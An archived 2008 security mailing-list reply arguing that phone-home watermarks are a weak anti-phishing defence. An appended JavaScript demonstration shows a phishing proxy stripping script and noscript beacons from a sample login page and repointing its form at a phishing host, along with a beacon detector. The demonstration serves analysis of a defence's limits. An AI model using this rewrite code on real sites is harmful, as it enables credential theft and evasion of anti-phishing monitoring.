Security Basics mailing list archives

Re: Anti-Phishing with digital watermarking


From: Ansgar Wiechers <bugtraq () planetcobalt net>
Date: Mon, 29 Sep 2008 19:34:24 +0200

On 2008-09-29 Razi Shaban wrote:
- Alerts based on client-side scripting won't work when scripting is
  disabled in the browser, which is the more secure setting to begin
  with. So, to enable this kind of alert, you'd have to lower the
  overall security of the browser.

People who have enough tech knowledge to disable scripting are not the
target audience of phishing. Those are the people least likely to fall
for it. It is rather the people who don't know what a "script" is that
are going to be susceptible.

Disabling JavaScript doesn't take any kind of technical knowledge. And
especially the people who don't know what a script is should disable
client-side scripting entirely rather than rely on JavaScript to tell
them whether they're secure or not.

- With client-side scripting enabled, phishers can most easily use the
  very same technology to rewrite those parts of the included original
  page they don't like.

I'm not even sure what this means,

I suspected as much.

but this watermarking (for lack of a better term) can be removed. All
watermarking can be removed. However, this watermarking is not meant
to show up on the user's screen, but rather to make the original
author aware of the phishing attempts.

Same difference. It doesn't matter whether the script raises a popup on
the user's desktop or sends a message back to the company. The phisher
can use both client- and server-side scripting to rewrite those parts of
the original page he doesn't like.

- Even with client-side scripting disabled, phishers can still use
  server-side scripting to rewrite those parts of the original page
  they don't like, because they're acting as a man-in-the-middle.

If the phisher is not aware of or cannot find the exact code
responsible for the phone-home reaction, they can't remove it.

Underestimating an enemy sounds kinda risky to me. What makes you
believe your little phone-home is so hard to detect for the bad guys?

A general response to your ideas on disabling client-side scripting is
easily refuted by the idea of scale. Phishing does not target one, it
targets many. If one user -- hell, seventy -- have all the protection
afforded by modern technology, the phone-home reaction will still take
place. Why? Because any phishing worth mentioning is viewed thousands
of times, and at least one of the users being targeted will be running
IE5 with absolutely no security. The goal of this is, again, to make
the original author aware of the phishing, not to prevent it
altogether.

Which, of course, is totally unreliable (and thus utterly pointless as a
security measure), because you make way too many assumptions (client has
JavaScript enabled, phisher doesn't check the used website for
phone-home code, phisher uses the original website in the first place, ...).

Regards
Ansgar Wiechers
-- 
"The Mac OS X kernel should never panic because, when it does, it
seriously inconveniences the user."
--http://developer.apple.com/technotes/tn2004/tn2118.html
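The man-in-the-middle rewrite Ansgar describes, as an added example that is not part of the original thread and not code from either participant: the server-side step a phishing proxy would run on every page it fetches from the real site, stripping the phone-home "watermark" before the copy ever reaches the victim's browser. The site bank.example, the phishing host bank-example.test, the /beacon endpoint and the sample login page are all constructed for this demonstration.

```javascript
// Added example, not code from the original thread. It demonstrates the
// point made above: a phisher proxying the real page can remove a
// JavaScript (or <noscript> image) phone-home on the server side, so
// whether the victim has scripting enabled makes no difference.
// Hostnames, endpoint and page below are constructed for the demo.

const ORIGINAL_ORIGIN = "https://bank.example";   // assumed real site
const PHISH_ORIGIN = "https://bank-example.test"; // assumed phishing host

// Constructed sample of a "watermarked" login page. It carries a script
// beacon and a <noscript> image beacon, the two ways such a phone-home
// is usually wired up.
const ORIGINAL_PAGE = `<!doctype html>
<html><head><title>Bank Login</title>
<link rel="stylesheet" href="https://bank.example/css/site.css">
<script>
// phone-home: report where this page is actually being rendered
if (location.hostname !== "bank.example") {
  new Image().src = "https://bank.example/beacon?ref=" +
    encodeURIComponent(location.href);
}
</script>
</head><body>
<form method="post" action="https://bank.example/login">
  <input name="user"><input name="pass" type="password">
  <button>Log in</button>
</form>
<noscript><img src="https://bank.example/beacon?js=0" width="1" height="1"></noscript>
</body></html>`;

// The rewrite a phishing proxy applies to a fetched page. Note that it
// needs no knowledge of the "exact code" of the phone-home: it drops
// every script and noscript block wholesale and repoints what is left.
function rewriteForPhish(html, originalOrigin, phishOrigin) {
  let out = html;
  // 1. Drop all inline scripts; a static copy of a login form needs none.
  out = out.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, "");
  // 2. Drop <noscript> blocks, where image beacons for non-JS clients hide.
  out = out.replace(/<noscript\b[^>]*>[\s\S]*?<\/noscript>/gi, "");
  // 3. Drop any remaining tracking pixel that still points at the beacon.
  out = out.replace(/<img\b[^>]*\bsrc=["'][^"']*\/beacon[^"']*["'][^>]*>/gi, "");
  // 4. Repoint every remaining absolute reference (stylesheet, form
  //    action) at the phishing host so the copy renders and posts there.
  out = out.split(originalOrigin).join(phishOrigin);
  return out;
}

// What the original author's side could look for in a captured copy:
// returns every trace of the phone-home still present in the page.
function findBeacons(html, originalOrigin) {
  const host = new URL(originalOrigin).hostname;
  const found = [];
  for (const m of html.matchAll(/<script\b[^>]*>[\s\S]*?<\/script>/gi)) {
    found.push("script:" + m[0].slice(0, 40));
  }
  for (const m of html.matchAll(/<noscript\b[^>]*>[\s\S]*?<\/noscript>/gi)) {
    found.push("noscript:" + m[0].slice(0, 40));
  }
  for (const m of html.matchAll(/\/beacon[^"'\s>]*/g)) {
    found.push("beacon-url:" + m[0]);
  }
  if (html.includes(host)) {
    found.push("host:" + host);
  }
  return found;
}

const PHISHED_PAGE = rewriteForPhish(ORIGINAL_PAGE, ORIGINAL_ORIGIN, PHISH_ORIGIN);
console.log("beacons in original:", findBeacons(ORIGINAL_PAGE, ORIGINAL_ORIGIN));
console.log("beacons after rewrite:", findBeacons(PHISHED_PAGE, ORIGINAL_ORIGIN));
console.log(PHISHED_PAGE);
```

Two things the run makes concrete. First, the proxy does not have to locate the specific phone-home snippet; stripping every `<script>` and `<noscript>` block is enough, and the form still works because only its action changed. Second, a victim browsing with JavaScript disabled never executed the script beacon anyway; the only thing that could have fired for them was the `<noscript>` pixel, and that is removed in the same pass. Nothing about the client's settings helps or hurts the phone-home once the page is served through the phisher.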

